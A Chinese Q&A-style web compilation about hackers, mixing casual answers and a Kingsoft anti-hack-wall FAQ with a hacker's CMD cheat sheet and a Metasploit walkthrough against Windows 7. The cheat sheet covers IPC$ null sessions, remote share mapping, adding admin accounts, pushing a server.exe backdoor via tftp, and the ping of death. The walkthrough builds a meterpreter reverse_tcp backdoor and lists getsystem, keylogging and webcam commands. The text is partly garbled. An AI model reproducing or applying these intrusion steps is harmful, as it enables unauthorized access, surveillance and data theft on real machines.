现在的女黑客多吗

女黑客少，男黑客多。

高水平的黑客少，中低水平的黑客多。

落后地区的黑客少，发达地区的黑客多。

民间的黑客技术参差不齐，国家军方或专业人士技术高！！！！

中国现在的骇客 红客都在做什么？

骇客，赚钱。红客照样在赚钱，只不过是光明正大，开网站，给人注册，教别人怎么弄，一个月多少多少，他们教出来的大多数都是骇客。人家收了钱管你变什么客。

最近金山毒霸老是发现黑客远程攻击~！怎么办？

关于对防黑墙弹黑客攻击泡泡的相关疑问的解答【官方资料解答】

摘要：最近互联网上小黑客活动猖獗，导致部分用户发现自己电脑上弹出了拦截黑客攻击泡泡（到目前为止，未发现是误报），请不要担心, 防黑墙可以轻松拦截这些攻击，你的电脑很安全。如果你还有疑虑和担心，请仔细看完下面的几个问题，谢谢！

为方便理解，做如下简单类比：

电 脑 -你自己

互联网 -人来人往的集市

黑 客 -小偷，扒手

防火墙 -职业打手

防黑墙 -反扒高手

1.我的电脑连上网后到底是否安全

大部分电脑是安全的。电脑连上网，就如同我们走在人来人往的集市，被小偷扒手偷走钱财的机率还是很低的。 盖茨让电脑连上网，肯定考虑到了电脑安全问题，它的系统就不会这么容易就被一些小黑客攻击成功的。特别是有了防黑墙，你的系统就更加不容易被黑客攻击成功了，防黑墙拦截当前这些互联网上这些小黑客的攻击还是很有信心的。

2.为什么我的电脑弹了防黑墙的黑客攻击泡泡，真的有黑客在攻击我的电脑吗

确实有，在没有防黑墙之前你的电脑也可能被黑客攻击过，只不过没有软件告诉你，黑客也没有攻击成功。所以你没有察觉，有了防黑墙，你不但可以知道有没有黑客在攻击你，并且可以确保你的电脑不被黑客攻击成功。

3.我的电脑弹了黑客攻击的泡泡，是否我的电脑就不安全了？

你的电脑很安全，弹了发现黑客攻击的泡泡，只说明有黑客试图攻击你的电脑,但被防黑墙发现并拦截了，然后弹泡提示了下。就如同我们走在人来人往的集市中时，身边有小偷经过，我们身后的反扒高手提示我们说有个小偷路过了。在当下小黑客猖獗的互联网上，家门口路过一些小黑客是很正常的，只要你的电脑系统够坚强，随便他们路过，特别是有了防黑墙，让这些小黑客们泪奔而去吧。

4.为什么我的电脑上弹了这么多黑客攻击泡泡？会不会是误报。

林子大了，坏鸟也自然也就多了，另外由于某些用户所在的IP段上的电脑比较活跃，自然就会有许多黑客们来光顾了。就如同在人气越旺的集市里，遇到小偷扒手的机率往往也会越多。而有的用户所在的IP段电脑不活跃，没被黑客或只被部分黑客瞄上，就不会被弹泡，或者弹的泡泡非常少。

5.为什么我所有的高危补丁全打了，防黑墙也提示我的防黑客能力强了 还是会弹黑客攻击泡泡。

因为黑客不知道哪个机器的防黑客能力弱，哪个强，然后只攻击防黑能力弱的。 所以小黑客们一般化是对一个IP范围进行撒网工攻击的，攻击成功几个是几个。如果刚好我们的电脑处于被黑客攻击的IP段，这此黑客的攻击会被防黑墙拦截掉，并根据情况做出提示。 这个时候我们的电脑是非常安全的。

6.装了防黑墙还要装防火墙吗

防黑墙可以自动判断网络请求是否为黑客攻击，误报少，还不需要专业的设置就可以使用。同时，在云端我们也会根据所有用户遇到的黑客攻击情况，及时调整防黑墙客户端的拦截逻辑。

防火墙也可以通过设置一些规则来达到基本的防黑功能，但其设置门槛较高，稍不小心就有误报。但防火墙更加灵活，可自由定制需求, 是一些网络高手的最爱。

如果你是网络高手，好好训练一下你的防火墙就可以让你的职业打手拥有防扒的基本能力。

如果你愿意，带着一个反扒高手还再带一个职业打手去逛街也可以,只要你不怕你的打手乱打人就行{yct28} 。

如果为了防止黑客攻击，装了防黑墙，可以不用再装防火墙。做为高级用户，防黑墙暂时没有许多可以DIY的东西，可以再装个防火墙玩玩。

7. 黑客攻击和病毒，木马是什么关系，中了病毒才会弹黑客攻击的泡泡吗？

黑客攻击成功后， 就会去下载病毒木马，这些病毒木马还要必须能有能力绕过毒霸的边界防御和系统防御，电脑才会有机会中病毒。弹黑客攻击泡泡是防黑墙拦截掉了黑客的攻击，黑客要想在你的电脑上放上木马，要经过 防黑墙，边界防御，系统防御三重防御才行。

防黑墙是新一代防火墙，是防火墙升级版本，防黑墙的目标是：简单，让用户安心。防黑墙要解决传统防火墙设置复杂，选择多，提示多, 普通用户不会操作的问题，防黑墙可以让用户不用做太多设置就可以精确拦截黑客攻击，让用户更安心！

免杀对黑客有多重要

免杀只是针对黑软而言，可以说它们生存的基础。而黑客是一门高深的学问，并不是所有的黑客都必须使用黑软。依赖工具的黑客不是好黑客，真正的黑客使用的是一技术和知识，而这两者无需免杀却永久免杀。

瑞典最大连锁超市遭国际黑客袭击，黑客为何会如此猖獗？

因为黑客一般都拥有比较高超的技术，很难有高手能够与他们的技术相匹敌，他们也很难被追溯到，受到法律惩处的机会也不是特别多。

当黑客要懂得哪些主要的CMD命令?

net use \ip\ipc$ " " /user:" " 建立IPC空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \ip\c$ 登陆后映射对方C：到本地为H:

net use \ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具

有管理员权限,注意：***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \目标ip 查看对方时间

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上

参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc

net share ipc$ /del 删除ipc

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip

协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的

用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设

置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]

数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之

ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，

ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装

目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安

装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除

只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏

、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文

件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名 移动文件,

用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件

中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算

机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参

数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成

3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指

ASCLL格式文件

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件（所

有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\目录名复制文件和目录树，用参数/Y将

不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe

登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二

进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模

式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二

进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码

Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理

性的MAC地址。arp -a将显示出全部信息

arp -s ip 物理地址 想ARP高速缓存中人工输入一个静态项目 ,该项目在计算机引导过程中将保持有效状态,或者出现错误的时候 人工配置的物理地址将更新本项目

arp -d ip 本命令能人工栓除一个静态项目

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程

序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读

，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时

间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和

时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p 显示以P开头的环境变量

看黑客怎么使用Metasploit进行渗透windows7的

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit-z-j：方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五：以上步骤全部完成后黑客就能通过后门程序反向连接到msf，用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf，详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块，因此的话溢出成功后黑客就能攻击载荷进行使用，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道，这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外，附meterpreter常用命令：getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景，需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘